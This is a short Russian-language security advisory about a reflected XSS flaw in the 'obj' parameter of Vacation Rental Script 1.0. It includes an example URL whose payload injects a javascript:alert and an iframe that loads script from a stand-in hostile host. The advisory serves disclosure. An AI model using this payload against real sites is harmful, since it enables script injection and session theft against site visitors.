Программа: Vacation Rental Script 1.0, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "obj". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://victim/index.php?obj=<INPUT%20TYPE="IMAGE"%20SRC= javascript:alert(‘XSS’);><iframe%20src=http://www.evilsite.com/code.js>
 



Оставить мнение